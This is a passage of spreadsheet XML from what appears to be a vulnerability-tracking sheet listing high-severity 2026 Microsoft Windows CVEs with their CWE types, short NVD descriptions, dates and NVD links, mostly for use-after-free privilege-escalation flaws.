          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69735</t>
        </is>
      </c>
      <c r="D975" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F975" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G975" s="5" t="inlineStr"/>
      <c r="H975" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I975" s="5" t="inlineStr"/>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr"/>
      <c r="L975" s="5" t="inlineStr"/>
      <c r="M975" s="5" t="inlineStr"/>
      <c r="N975" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P975" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q975" s="5" t="inlineStr"/>
      <c r="R975" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S975" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69779</t>
        </is>
      </c>
      <c r="D976" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F976" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G976" s="5" t="inlineStr"/>
      <c r="H976" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I976" s="5" t="inlineStr"/>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr"/>
      <c r="L976" s="5" t="inlineStr"/>
      <c r="M976" s="5" t="inlineStr"/>
      <c r="N976" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O976" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P976" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q976" s="5" t="inlineStr"/>
      <c r="R976" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S976" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69791</t>
        </is>
      </c>
      <c r="D977" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F977" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I977" s="5" t="inlineStr"/>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr"/>
      <c r="L977" s="5" t="inlineStr"/>
      <c r="M977" s="5" t="inlineStr"/>
      <c r="N977" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P977" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q977" s="5" t="inlineStr"/>
      <c r="R977" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S977" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69806</t>
        </is>
      </c>
      <c r="D978" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F978" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I978" s="5" t="inlineStr"/>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr"/>
      <c r="L978" s="5" t="inlineStr"/>
      <c r="M978" s="5" t="inlineStr"/>
      <c r="N978" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O978" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P978" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q978" s="5" t="inlineStr"/>
      <c r="R978" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-94</t>
        </is>
      </c>
      <c r="S978" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="D979" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F979" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I979" s="5" t="inlineStr"/>
      <c r="J979" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K979" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L979" s="5" t="inlineStr"/>
      <c r="M979" s="5" t="inlineStr"/>
      <c r="N979" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P979" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q979" s="5" t="inlineStr"/>
      <c r="R979" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S979" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="D980" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F980" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G980" s="5" t="inlineStr"/>
      <c r="H980" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I980" s="5" t="inlineStr"/>
      <c r="J980" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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80" s="5" t="inlineStr"/>
      <c r="M980" s="5" t="inlineStr"/>
      <c r="N980" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O980" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P980" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q980" s="5" t="inlineStr"/>
      <c r="R980" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S980" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="D981" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F981" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G981" s="5" t="inlineStr"/>
      <c r="H981" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I981" s="5" t="inlineStr"/>
      <c r="J981" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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1" s="5" t="inlineStr"/>
      <c r="M981" s="5" t="inlineStr"/>
      <c r="N981" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O981" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P981" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q981" s="5" t="inlineStr"/>
      <c r="R981" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S981" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="D982" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F982" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G982" s="5" t="inlineStr"/>
      <c r="H982" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I982" s="5" t="inlineStr"/>
      <c r="J982" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K982" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L982" s="5" t="inlineStr"/>
      <c r="M982" s="5" t="inlineStr"/>
      <c r="N982" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O982" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P982" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q982" s="5" t="inlineStr"/>
      <c r="R982" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S982" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="D983" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F983" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G983" s="5" t="inlineStr"/>
      <c r="H983" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I983" s="5" t="inlineStr"/>
      <c r="J983" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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3" s="5" t="inlineStr"/>
      <c r="M983" s="5" t="inlineStr"/>
      <c r="N983" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P983" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q983" s="5" t="inlineStr"/>
      <c r="R983" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S983" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="D984" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F984" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G984" s="5" t="inlineStr"/>
      <c r="H984" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I984" s="5" t="inlineStr"/>
      <c r="J984" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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4" s="5" t="inlineStr"/>
      <c r="M984" s="5" t="inlineStr"/>
      <c r="N984" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O984" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P984" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q984" s="5" t="inlineStr"/>
      <c r="R984" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S984" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="D985" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F985" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G985" s="5" t="inlineStr"/>
      <c r="H985" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I985" s="5" t="inlineStr"/>
      <c r="J985" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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5" s="5" t="inlineStr"/>
      <c r="M985" s="5" t="inlineStr"/>
      <c r="N985" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O985" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P985" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q985" s="5" t="inlineStr"/>
      <c r="R985" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="S985" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="D986" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F986" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G986" s="5" t="inlineStr"/>
      <c r="H986" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I986" s="5" t="inlineStr"/>
      <c r="J986" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K98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986" s="5" t="inlineStr"/>
      <c r="M986" s="5" t="inlineStr"/>
      <c r="N986" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P986" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q986" s="5" t="inlineStr"/>
      <c r="R986" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S986" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="D987" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F987" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G987" s="5" t="inlineStr"/>
      <c r="H987" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I987" s="5" t="inlineStr"/>
      <c r="J987" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K98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987" s="5" t="inlineStr"/>
      <c r="M987" s="5" t="inlineStr"/>
      <c r="N987" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P987" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q987" s="5" t="inlineStr"/>
      <c r="R987" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S987" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="D988" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F988" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G988" s="5" t="inlineStr"/>
      <c r="H988" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I988" s="5" t="inlineStr"/>
      <c r="J988" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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88" s="5" t="inlineStr"/>
      <c r="M988" s="5" t="inlineStr"/>
      <c r="N988" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P988" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q988" s="5" t="inlineStr"/>
      <c r="R988" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S988" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="D989" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F989" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G989" s="5" t="inlineStr"/>
      <c r="H989" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I989" s="5" t="inlineStr"/>
      <c r="J989" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K989" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L989" s="5" t="inlineStr"/>
      <c r="M989" s="5" t="inlineStr"/>
      <c r="N989" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O989" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P989" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q989" s="5" t="inlineStr"/>
      <c r="R989" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S989" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="D990" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F990" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G990" s="5" t="inlineStr"/>
      <c r="H990" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I990" s="5" t="inlineStr"/>
      <c r="J990" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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0" s="5" t="inlineStr"/>
      <c r="M990" s="5" t="inlineStr"/>
      <c r="N990" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O990" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P990" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q990" s="5" t="inlineStr"/>
      <c r="R990" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S990" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="D991" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F991" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G991" s="5" t="inlineStr"/>
      <c r="H991" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I991" s="5" t="inlineStr"/>
      <c r="J991" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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1" s="5" t="inlineStr"/>
      <c r="M991" s="5" t="inlineStr"/>
      <c r="N991" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O991" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P991" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q991" s="5" t="inlineStr"/>
      <c r="R991" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S991" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="D992" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F992" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G992" s="5" t="inlineStr"/>
      <c r="H992" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I992" s="5" t="inlineStr"/>
      <c r="J992" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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2" s="5" t="inlineStr"/>
